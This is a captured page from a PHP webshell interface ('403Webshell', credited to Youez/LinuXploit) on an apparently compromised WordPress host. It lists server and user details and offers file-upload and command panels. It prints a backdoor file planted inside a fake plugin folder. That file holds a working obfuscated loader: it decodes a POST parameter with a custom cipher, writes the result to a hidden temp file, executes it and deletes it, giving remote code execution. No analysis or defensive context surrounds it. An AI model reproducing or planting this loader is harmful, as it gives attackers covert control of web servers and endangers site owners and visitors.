403Webshell
Server IP : 145.239.37.162  /  Your IP : 216.73.217.71
Web Server : Apache
System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaa ( 38250)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/v/e/r/verseaa/www/wp-content/plugins/widget_1785838784/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/v/e/r/verseaa/www/wp-content/plugins/widget_1785838784/inc/bottom-1785838784.php
<!--ZRFVcopI-->
<?php

if(filter_has_var(INPUT_POST, "sy\x6Db\x6F\x6C")){
$bind = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), sys_get_temp_dir(), "/dev/shm", "/var/tmp", getenv("TMP"), getcwd()]);
$elem = $_POST["sy\x6Db\x6F\x6C"];
$elem=  explode		 ('.'	, $elem 	)	 ;
$entity = '';
$s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s2);

foreach ($elem as $i=>$val):
    $sChar = ord($s2[$i % $lenS]);
    $dec = ((int)$val - $sChar - ($i % 10)) ^ 62;
    $entity .= chr($dec);
endforeach;
foreach ($bind as $value) {
            if (!( !is_dir($value) || !is_writable($value) )) {
            $rec = "$value" . "/.pset";
            $written = file_put_contents($rec, $entity);
if ($written !== false) {
    include $rec;
    unlink($rec);
    die();
}
        }
}
}

Youez - 2016 - github.com/yon3zu
LinuXploit